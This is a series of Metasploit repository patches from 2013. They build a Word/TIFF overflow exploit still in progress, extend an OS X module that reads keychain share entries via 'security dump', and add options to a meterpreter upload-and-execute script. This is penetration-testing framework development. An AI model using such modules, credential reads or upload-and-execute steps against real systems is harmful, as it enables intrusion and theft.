@@ -731,3 +832,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 end
 
+=begin
+
+  To-do:
+  Turn the docx packaging into a mixin. Good luck with that. 
+  
+=end

From 3afa21c7218e8c4b70989d5d7f6ed392c5a634b2 Mon Sep 17 00:00:00 2001
From: Peter Toth <peter.toth@sucaba.eu>
Date: Thu, 21 Nov 2013 23:55:24 +0100
Subject: [PATCH 045/217] Added favorite and recent shares to the output

---
 modules/post/osx/manage/mount_share.rb | 143 +++++++++++++++++++++----
 1 file changed, 122 insertions(+), 21 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index 0cf1ac3415..a85594a090 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -37,6 +37,8 @@ class Metasploit3 < Msf::Post
         OptString.new('VOLUME', [true, 'Name of network share volume. `set ACTION LIST` to get a list.', 'localhost']),
         OptString.new('SECURITY_PATH', [true, 'Path to the security executable.', '/usr/bin/security']),
         OptString.new('OSASCRIPT_PATH', [true, 'Path to the osascript executable.', '/usr/bin/osascript']),
+        OptString.new('SIDEBAR_PLIST_PATH', [true, 'Path to the finder sidebar plist.', '~/Library/Preferences/com.apple.sidebarlists.plist']),
+        OptString.new('RECENT_PLIST_PATH', [true, 'Path to the finder recent plist.', '~/Library/Preferences/com.apple.recentitems.plist']),
         OptString.new('PROTOCOL', [true, 'Network share protocol. `set ACTION LIST` to get a list.', 'smb'])
       ], self.class)
 
@@ -45,24 +47,59 @@ class Metasploit3 < Msf::Post
   def run
     fail_with("Invalid action") if action.nil?
 
+    username = cmd_exec('whoami')
+    security_path = datastore['SECURITY_PATH'].shellescape
+    sidebar_plist_path = datastore['SIDEBAR_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}").shellescape
+    recent_plist_path = datastore['RECENT_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}").shellescape
+
     if action.name == 'LIST'
-      saved_shares = get_share_list
-      if saved_shares.length == 0
-        print_status("No Network Share credentials were found in the keyrings")
-      else
-        print_status("Network shares saved in keyrings:")
-        print_status("Protocol\tShare Name")
-        saved_shares.each do |line|
-          print_good(line)
+      if file?(security_path)
+        saved_shares = get_keyring_shares(security_path)
+        if saved_shares.length == 0
+          print_status("No Network Share credentials were found in the keyrings")
+        else
+          print_status("Network shares saved in keyrings:")
+          print_status("  Protocol\tShare Name")
+          saved_shares.each do |line|
+            print_good("  #{line}")
+          end
         end
+      else
+        print_error("Could not check keyring contents: Security binary not found.")
       end
-      mounted_shares = get_mounted_list
+      if file?(sidebar_plist_path)
+        favorite_shares = get_favorite_shares(sidebar_plist_path)
+        if favorite_shares.length == 0
+          print_status("No favorite shares were found")
+        else
+          print_status("Favorite shares (without stored credentials):")
+          favorite_shares.each do |line|
+            print_good("  #{line}")
+          end
+        end
+      else
+        print_error("Could not check sidebar favorites contents: Sidebar plist not found")
+      end
+      if file?(recent_plist_path)
+        recent_shares = get_recent_shares(recent_plist_path)
+        if recent_shares.length == 0
+          print_status("No recent shares were found")
+        else
+          print_status("Recent shares (without stored credentials):")
+          recent_shares.each do |line|
+            print_good("  #{line}")
+          end
+        end
+      else
+        print_error("Could not check recent favorites contents: Recent plist not found")
+      end
+      mounted_shares = get_mounted_volumes
       if mounted_shares.length == 0
         print_status("No volumes found in /Volumes")
       else
         print_status("Mounted Volumes:")
         mounted_shares.each do |line|
-          print_good(line)
+          print_good("  #{line}")
         end
       end
     elsif action.name == 'MOUNT'
@@ -72,15 +109,15 @@ class Metasploit3 < Msf::Post
     end
   end
 
-  def get_share_list
-    vprint_status(datastore['SECURITY_PATH'].shellescape + " dump")
-    data = cmd_exec(datastore['SECURITY_PATH'].shellescape + " dump")
+  def get_keyring_shares(security_path)
+    vprint_status("#{security_path} dump")
+    data = cmd_exec("#{security_path} dump")
     # Grep for desc srvr and ptcl
     tmp = []
     lines = data.lines
     lines.each do |line|
       line.strip!
-      unless line !~ /desc|srvr|ptcl/
+      if line =~ /desc|srvr|ptcl/
         tmp.push(line)
       end
     end
@@ -91,15 +128,79 @@ class Metasploit3 < Msf::Post
       if tmp[x] =~ /"desc"<blob>="Network Password"/ && x < tmp.length-3
         # Remove everything up to the double-quote after the equal sign,
         # and also the trailing double-quote
-        protocol = tmp[x+1].gsub(/^.*\=\"/, '').gsub(/\w*\"\w*$/, '')
-        server = tmp[x+2].gsub(/^.*\=\"/, '').gsub(/\"\w*$/, '')
-        list.push(protocol + "\t" + server)
+        if tmp[x+1] =~ /^.*\=\"(.*)\w*\"\w*$/
+          protocol = $1
+          if protocol =~ /smb|nfs|cifs|ftp|afp/ && tmp[x+2] =~ /^.*\=\"(.*)\"\w*$/
+            server = $1
+            list.push(protocol + "\t" + server)
+          end
+        end
       end
     end
     return list.sort
   end
 
-  def get_mounted_list
+  def get_favorite_shares(sidebar_plist_path)
+    vprint_status("defaults read #{sidebar_plist_path} favoriteservers")
+    data = cmd_exec("defaults read #{sidebar_plist_path} favoriteservers")
+
+    # Grep for URL
+    list = []
+    lines = data.lines
+    lines.each do |line|
+      line.strip!
+      if line =~ /^URL = \"(.*)\"\;$/
+        list.push($1)
+      end
+    end
+
+    vprint_status("defaults read #{sidebar_plist_path} favorites")
+    data = cmd_exec("defaults read #{sidebar_plist_path} favorites")
+    # Grep for EntryType and Name
+    tmp = []
+    lines = data.lines
+    lines.each do |line|
+      line.strip!
+      if line =~ /EntryType|Name/
+        tmp.push(line)
+      end
+    end
+
+    # Go through the list, find the rows with EntryType 8 and their
+    # corresponding name
+    for x in 0..tmp.length-1
+      if tmp[x] =~ /EntryType = 8;/ && x < tmp.length-2
+        if tmp[x+1] =~ /^Name \= \"(.*)\"\;$/
+          name = $1
+          list.push(name) unless list.include?(name)
+        elsif tmp[x+1] =~ /^Name \= (.*)\;$/
+          name = $1
+          list.push(name) unless list.include?(name)
+        end
+      end
+    end
+    return list.sort
+  end
+
+  def get_recent_shares(recent_plist_path)
+    vprint_status("defaults read #{recent_plist_path} RecentServers")
+    data = cmd_exec("defaults read #{recent_plist_path} RecentServers")
+
+    # Grep for Name
+    list = []
+    lines = data.lines
+    lines.each do |line|
+      line.strip!
+      if line =~ /^Name = \"(.*)\"\;$/
+        list.push($1) unless list.include?($1)
+      elsif line =~ /^Name = (.*)\;$/
+        list.push($1) unless list.include?($1)
+      end
+    end
+    return list.sort
+  end
+
+  def get_mounted_volumes
     vprint_status("ls /Volumes")
     data = cmd_exec("ls /Volumes")
     list = []
@@ -112,10 +213,10 @@ class Metasploit3 < Msf::Post
   end
 
   def mount
-    share_name = datastore['VOLUME']
-    protocol = datastore['PROTOCOL']
+    share_name = datastore['VOLUME'].shellescape
+    protocol = datastore['PROTOCOL'].shellescape
     print_status("Connecting to #{protocol}://#{share_name}")
-    cmd = "osascript -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'"
+    cmd = "osascript -e 'tell app \"finder\" to mount volume #{protocol}://#{share_name}'"
     vprint_status(cmd)
     cmd_exec(cmd)
   end

From 885fedcc3b55c60f2aaaac24bb8359059af1f2bd Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 21 Nov 2013 17:42:31 -0600
Subject: [PATCH 046/217] Fix target name

---
 modules/exploits/windows/http/desktopcentral_file_upload.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb
index 5dec0badca..d790b28ccb 100644
--- a/modules/exploits/windows/http/desktopcentral_file_upload.rb
+++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_X86,
       'Targets'        =>
         [
-          [ 'Manage Desktop Central 8 server / Windows', {} ]
+          [ 'ManageEngine DesktopCentral 8 server / Windows', {} ]
         ],
       'Privileged'     => true,
       'DefaultTarget'  => 0,

From 8382d31f469c5915675a36eefd9af609ec67d57b Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 21 Nov 2013 18:48:12 -0600
Subject: [PATCH 047/217] More progress

---
 .../windows/fileformat/mswin_tiff_overflow.rb | 84 ++++++++++++++++---
 1 file changed, 73 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index dced5b74d0..bcd399bed8 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -201,7 +201,9 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0x00000003].pack('V')
     mscd << [0xfffffffe].pack('V')
     mscd << [0xffffffff].pack('V') * 52
-    # mscd << "PAYLOAD"
+
+    mscd << "W00TW00T"
+    mscd << "A" * 1024
 
     mscd
   end
@@ -344,8 +346,37 @@ class Metasploit3 < Msf::Exploit::Remote
       'w:shapeid' =>"_x0000_i10#{rid.to_s}"
     }
 
+    shapetype_attrs = {
+      'id'               => "rId#{rid.to_s}",
+      'coordsize'        => "21600,21600",
+      'o:spt'            => "75",
+      'o:preferrelative' => "t",
+      'path'             => "m@4@5l@4@11@9@11@9@5xe",
+      'filled'           => "f",
+      'stroked'          => "f"
+    }
+
     xml.r do
       xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
+        xml['v'].shapetype(shapetype_attrs) do
+          xml['v'].stroke({'joinstyle'=>'miter'})
+          xml['v'].formulas do
+            xml['v'].f({'eqn' => "if lineDrawn pixelLineWidth 0"})
+            xml['v'].f({'eqn' => "sum @0 1 0"})
+            xml['v'].f({'eqn' => "sum 0 0 @1"})
+            xml['v'].f({'eqn' => "prod @2 1 2"})
+            xml['v'].f({'eqn' => "prod @3 21600 pixelWidth"})
+            xml['v'].f({'eqn' => "prod @3 21600 pixelHeight"})
+            xml['v'].f({'eqn' => "sum @0 0 1"})
+            xml['v'].f({'eqn' => "prod @6 1 2"})
+            xml['v'].f({'eqn' => "prod @7 21600 pixelWidth"})
+            xml['v'].f({'eqn' => "sum @8 21600 0"})
+            xml['v'].f({'eqn' => "prod @7 21600 pixelHeight"})
+            xml['v'].f({'eqn' => "sum @10 21600 0"})
+          end
+          xml['v'].path({'o:extrusionok' => "f", 'gradientshapeok' => "t", 'o:connecttype' => "rect"})
+          xml['o'].lock({'v:ext' => "edit", 'aspectratio' => "t"})
+        end
         xml['v'].shape(shape_attrs)
         xml['w'].control(control_attrs)
       end
@@ -410,6 +441,36 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
 
+  #
+  # Creates a <w:sectPr> tag
+  # @param xml [Element]
+  #
+  def create_secpr(xml)
+    sectpr_attrs = {
+      'w:rsidR'    => "00D15BD0",
+      'w:rsidRPr'  => "00D15BD0",
+      'w:rsidSect' => "00F8254F"
+    }
+
+    pgmar_attrs = {
+      'w:top'    => "1",
+      'w:right'  => "1",
+      'w:bottom' => "1",
+      'w:left'   => "1",
+      'w:header' => "1",
+      'w:footer' => "1",
+      'w:gutter' => "0"
+    }
+
+    xml['w'].sectPr(sectpr_attrs) do
+      xml['w'].pgSz({'w:w'=>"1", 'w:h'=>"1"})
+      xml['w'].pgMar(pgmar_attrs)
+      xml['w'].cols({'w:space'=>"1"})
+      xml['w'].docGrid({'w:linePitch'=>"1"})
+    end
+  end
+
+
   #
   # Creates a document.xml file
   # @param pre_defs [Array]
@@ -420,7 +481,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
     # Get all the required pre-defs
     chart_rids = []
-    pre_defs.select { |e| chart_rids << e[:id] }
+    pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
 
     # Get all the ActiveX RIDs
     ax_rids = []
@@ -461,10 +522,10 @@ class Metasploit3 < Msf::Exploit::Remote
               xml.rPr do
                 xml.lang({'w:val' => "en-US"})
               end
+            end
 
-              ax_rids.each do |rid|
-                create_ax_run_element(xml, rid)
-              end
+            ax_rids.each do |rid|
+              create_ax_run_element(xml, rid)
             end
           end
 
@@ -480,6 +541,7 @@ class Metasploit3 < Msf::Exploit::Remote
             create_pic_run_element(xml, tiff_rid)
           end
 
+          create_secpr(xml)
         end
       end
     end
@@ -502,16 +564,16 @@ class Metasploit3 < Msf::Exploit::Remote
   def make_contenttype_xml(overrides)
     contenttypes = [
       {
-        :Extension   =>"rels",
-        :ContentType =>"application/vnd.openxmlformats-package.relationships+xml"
+        :Extension   => "rels",
+        :ContentType => "application/vnd.openxmlformats-package.relationships+xml"
       },
       {
-        :Extension   =>"xml",
-        :ContentType =>"application/xml"
+        :Extension   => "xml",
+        :ContentType => "application/xml"
       },
       {
-        :Extension   =>"jpeg",
-        :Contenttype =>"image/jpeg"
+        :Extension   => "jpeg",
+        :Contenttype => "image/jpeg"
       },
       {
         :Extension   => "bin",

From 19ea29c6e7bf4e89319765ed3aca41c988170ad3 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 22 Nov 2013 12:47:04 +1000
Subject: [PATCH 048/217] Add usage when -rc -cl or -h are not passed

While testing stuff earlier today I had to use this script and I made the
mistake of not passing in the -rc flag to the script. I was confused for ages!

This change prints the usage message in the case where you don't pass proper
parameters to the script.
---
 scripts/meterpreter/multi_console_command.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb
index 9d32085387..4bf1ed6227 100644
--- a/scripts/meterpreter/multi_console_command.rb
+++ b/scripts/meterpreter/multi_console_command.rb
@@ -15,7 +15,7 @@
 )
 
 #Setting Argument variables
-commands = []
+commands = nil
 script = []
 help = 0
 
@@ -54,6 +54,7 @@ end
     if not ::File.exists?(script)
       raise "Command List File does not exists!"
     else
+      commands = []
       ::File.open(script, "r").each_line do |line|
         commands << line.chomp
       end
@@ -64,7 +65,7 @@ end
   end
 }
 
-if args.length == 0 or help == 1
+if args.length == 0 or help == 1 or commands.nil?
   usage
 else
   list_con_exec(commands)

From 4d2253fe35e87d185201a4feea8bdeb126e70c3f Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 02:25:09 -0600
Subject: [PATCH 049/217] Diet

---
 .../windows/fileformat/mswin_tiff_overflow.rb | 87 ++++---------------
 1 file changed, 15 insertions(+), 72 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index bcd399bed8..418015e452 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -229,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
       xml.ocx(attrs)
     end
 
-    builder.to_xml
+    builder.to_xml(:indent => 0)
   end
 
 
@@ -248,7 +248,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     end
 
-    builder.to_xml
+    builder.to_xml(:indent => 0)
   end
 
   #
@@ -267,7 +267,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     end
 
-    builder.to_xml
+    builder.to_xml(:indent => 0)
   end
 
 
@@ -291,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     {
       :fname => "_rels/.rels",
-      :data  => builder.to_xml
+      :data  => builder.to_xml(:indent => 0)
     }
   end
 
@@ -346,37 +346,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'w:shapeid' =>"_x0000_i10#{rid.to_s}"
     }
 
-    shapetype_attrs = {
-      'id'               => "rId#{rid.to_s}",
-      'coordsize'        => "21600,21600",
-      'o:spt'            => "75",
-      'o:preferrelative' => "t",
-      'path'             => "m@4@5l@4@11@9@11@9@5xe",
-      'filled'           => "f",
-      'stroked'          => "f"
-    }
-
     xml.r do
       xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
-        xml['v'].shapetype(shapetype_attrs) do
-          xml['v'].stroke({'joinstyle'=>'miter'})
-          xml['v'].formulas do
-            xml['v'].f({'eqn' => "if lineDrawn pixelLineWidth 0"})
-            xml['v'].f({'eqn' => "sum @0 1 0"})
-            xml['v'].f({'eqn' => "sum 0 0 @1"})
-            xml['v'].f({'eqn' => "prod @2 1 2"})
-            xml['v'].f({'eqn' => "prod @3 21600 pixelWidth"})
-            xml['v'].f({'eqn' => "prod @3 21600 pixelHeight"})
-            xml['v'].f({'eqn' => "sum @0 0 1"})
-            xml['v'].f({'eqn' => "prod @6 1 2"})
-            xml['v'].f({'eqn' => "prod @7 21600 pixelWidth"})
-            xml['v'].f({'eqn' => "sum @8 21600 0"})
-            xml['v'].f({'eqn' => "prod @7 21600 pixelHeight"})
-            xml['v'].f({'eqn' => "sum @10 21600 0"})
-          end
-          xml['v'].path({'o:extrusionok' => "f", 'gradientshapeok' => "t", 'o:connecttype' => "rect"})
-          xml['o'].lock({'v:ext' => "edit", 'aspectratio' => "t"})
-        end
         xml['v'].shape(shape_attrs)
         xml['w'].control(control_attrs)
       end
@@ -441,36 +412,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
 
-  #
-  # Creates a <w:sectPr> tag
-  # @param xml [Element]
-  #
-  def create_secpr(xml)
-    sectpr_attrs = {
-      'w:rsidR'    => "00D15BD0",
-      'w:rsidRPr'  => "00D15BD0",
-      'w:rsidSect' => "00F8254F"
-    }
-
-    pgmar_attrs = {
-      'w:top'    => "1",
-      'w:right'  => "1",
-      'w:bottom' => "1",
-      'w:left'   => "1",
-      'w:header' => "1",
-      'w:footer' => "1",
-      'w:gutter' => "0"
-    }
-
-    xml['w'].sectPr(sectpr_attrs) do
-      xml['w'].pgSz({'w:w'=>"1", 'w:h'=>"1"})
-      xml['w'].pgMar(pgmar_attrs)
-      xml['w'].cols({'w:space'=>"1"})
-      xml['w'].docGrid({'w:linePitch'=>"1"})
-    end
-  end
-
-
   #
   # Creates a document.xml file
   # @param pre_defs [Array]
@@ -529,19 +470,21 @@ class Metasploit3 < Msf::Exploit::Remote
             end
           end
 
-          # Charts
           xml.p(p_attrs) do
             xml.pPr do
-              chart_rids.each do |rid|
-                create_chart_run_element(xml, rid)
+              xml.rPr do
+                xml['w'].lang({'w:val'=>"en-US"})
               end
             end
 
+            # Charts
+            chart_rids.each do |rid|
+              create_chart_run_element(xml, rid)
+            end
+
             # TIFF
             create_pic_run_element(xml, tiff_rid)
           end
-
-          create_secpr(xml)
         end
       end
     end
@@ -551,7 +494,7 @@ class Metasploit3 < Msf::Exploit::Remote
       :type         => "#{@schema}/officeDocument",
       :fname        => "/word/document.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
-      :xml          => builder.to_xml
+      :xml          => builder.to_xml(:indent => 0)
     }
   end
 
@@ -604,7 +547,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     end
 
-    builder.to_xml
+    builder.to_xml(:indent => 0)
   end
 
 
@@ -622,7 +565,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     items << {
       :id           => (last_rid += 1),
-      :type         => "#{@schema}/core-properties",
+      :type         => "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties",
       :fname        => "/docProps/core.xml",
       :content_type => "application/vnd.openxmlformats-package.core-properties+xml"
     }
@@ -727,7 +670,7 @@ class Metasploit3 < Msf::Exploit::Remote
       id = (last_rid += 1)
 
       bin  = {
-        :fname => "/word/activeX/ActiveX#{id.to_s}.bin",
+        :fname => "/word/activeX/activeX#{id.to_s}.bin",
         :bin => make_activex_bin
       }
 

From 388064b78b1266cff8ad3209c319dc74296ac43f Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 22 Nov 2013 18:59:01 +1000
Subject: [PATCH 050/217] Add -x and -s parameters to uploadexec

Added -x parameter to the script which indicates that the underlying
meterpreter session should be terminated when the execution has
finished.

Added -s parameter which takes a floating point number as an arg
which indicates the number of seconds to sleep between uploading
and executing. This helps in the case where http(s) payloads are
used for meterpreter and a time delay is needed to make sure that
the file has been written to disk and the lock released prior to
attempting to executing it.
---
 scripts/meterpreter/uploadexec.rb | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)

diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb
index ccc997b884..5f36be6ddd 100644
--- a/scripts/meterpreter/uploadexec.rb
+++ b/scripts/meterpreter/uploadexec.rb
@@ -5,6 +5,8 @@ session = client
   "-e" => [ true, "Executable or script to upload to target host." ],
   "-o" => [ true, "Options for executable." ],
   "-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
+  "-x" => [ false,"Exit the session once the payload has been run." ],
+  "-s" => [ true,"Sleep for a number of seconds after uploading before executing." ],
   "-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
   "-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
 )
@@ -93,6 +95,8 @@ helpcall = 0
 path = ""
 verbose = 0
 remove = 0
+quit = 0
+sleep_sec = nil
 @@exec_opts.parse(args) { |opt, idx, val|
   case opt
   when "-e"
@@ -105,8 +109,12 @@ remove = 0
     verbose = 1
   when "-h"
     helpcall = 1
+  when "-s"
+    sleep_sec = val.to_f
   when "-r"
     remove = 1
+  when "-x"
+    quit = 1
   end
 
 }
@@ -116,9 +124,20 @@ if args.length == 0 || helpcall == 1
 end
 print_status("Running Upload and Execute Meterpreter script....")
 exec = upload(session,file,path)
+if sleep_sec
+  print_status("\tSleeping for #{sleep_sec}s...")
+  sleep(sleep_sec) 
+end
 cmd_on_trgt_exec(session,exec,cmdopt,verbose)
 if remove == 1
   print_status("\tDeleting #{exec}")
   m_unlink(session, exec)
 end
+
+if quit == 1
+  print_status("Closing the session...")
+  session.core.shutdown rescue nil
+  session.shutdown_passive_dispatcher
+end
+
 print_status("Finished!")

From 6d5c1c230c3a13309bb148fc3524e09241f44bb6 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 03:55:40 -0600
Subject: [PATCH 051/217] Progress

---
 .../windows/fileformat/mswin_tiff_overflow.rb   | 17 +++++++++--------
 1 file changed, 9 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 418015e452..ff149c552f 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -243,7 +243,7 @@ class Metasploit3 < Msf::Exploit::Remote
     acx_type = "http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary"
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
-    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
+    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
         xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin})
     end
     end
@@ -260,7 +260,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def make_doc_xml_reals(relationships)
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
-    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
+    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
       relationships.each do |r|
         xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]})
       end
@@ -282,7 +282,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
-    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
+    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
       rels.each do |r|
         xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')})
       end
@@ -447,7 +447,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'xmlns:c'   => "http://schemas.openxmlformats.org/markup-compatibility/2006"
     }
 
-    p_attrs = { 'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
+    p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
+    p_attrs_2 = {'w:rsidR' => "00D15BD0", 'w:rsidRPr' =>"00D15BD0", 'w:rsidRDefault' => "00D15BD0" }
 
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
@@ -456,7 +457,7 @@ class Metasploit3 < Msf::Exploit::Remote
       xml.document(doc_attrs) do
         xml.body do
           # Paragraph (ActiveX)
-          xml.p(p_attrs) do
+          xml.p(p_attrs_1) do
             # Paragraph properties
             xml.pPr do
               # Run properties
@@ -470,7 +471,7 @@ class Metasploit3 < Msf::Exploit::Remote
             end
           end
 
-          xml.p(p_attrs) do
+          xml.p(p_attrs_2) do
             xml.pPr do
               xml.rPr do
                 xml['w'].lang({'w:val'=>"en-US"})
@@ -516,7 +517,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       {
         :Extension   => "jpeg",
-        :Contenttype => "image/jpeg"
+        :ContentType => "image/jpeg"
       },
       {
         :Extension   => "bin",
@@ -666,7 +667,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def init_activex_files(last_rid)
     activex = []
 
-    40.times do |i|
+    1.times do |i|
       id = (last_rid += 1)
 
       bin  = {

From f1d181afc7ee052ed922f232cbcc06b78ed8aa7d Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 04:51:55 -0600
Subject: [PATCH 052/217] Progress

---
 .../windows/fileformat/mswin_tiff_overflow.rb        | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index ff149c552f..7210f2f47c 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -311,10 +311,10 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
       xml.drawing do
-        xml.inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
-          #xml.extend({'cx'=>'1', 'cy'=>'1'})
-          xml.effectExtend({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
-          xml.docPr({'id'=>"rId#{rid.to_s}", 'name' => "drawing #{rid.to_s}"})
+        xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
+          xml.extent({'cx'=>'1', 'cy'=>'1'})
+          xml.effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
+          xml.docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"})
           xml.cNvGraphicFramePr
           xml['a'].graphic({'xmlns'=>"#{drawingml_schema}/main"}) do
             xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do
@@ -371,8 +371,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
       xml.drawing do
         xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
-          #xml.extend({'cx'=>'1', 'cy'=>'1'})
-          xml['wp'].effectExtend({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"})
+          xml.extent({'cx'=>'1', 'cy'=>'1'})
+          xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"})
           xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"})
           xml['wp'].cNvGraphicFramePr do
             xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"})

From 4a6511311de7dda7531332c3e8ce710d9026c245 Mon Sep 17 00:00:00 2001
From: Peter Toth <peter.toth@sucaba.eu>
Date: Fri, 22 Nov 2013 15:35:45 +0100
Subject: [PATCH 053/217] Code improvements according to feedback

---
 modules/post/osx/manage/mount_share.rb | 48 +++++++++-----------------
 1 file changed, 16 insertions(+), 32 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index a85594a090..99b5e9d6b2 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -10,6 +10,8 @@ class Metasploit3 < Msf::Post
 
   include Msf::Post::File
 
+  REGEX_PROTO = "^.*\=\"(.*)\w*\"\w*$"
+  REGEX_SERVER = "^.*\=\"(.*)\"\w*$"
 
   def initialize(info={})
     super( update_info( info,
@@ -114,23 +116,18 @@ class Metasploit3 < Msf::Post
     data = cmd_exec("#{security_path} dump")
     # Grep for desc srvr and ptcl
     tmp = []
-    lines = data.lines
-    lines.each do |line|
-      line.strip!
-      if line =~ /desc|srvr|ptcl/
-        tmp.push(line)
-      end
-    end
+    lines = data.lines.select { |line| line =~ /desc|srvr|ptcl/ }.map(&:strip)
+
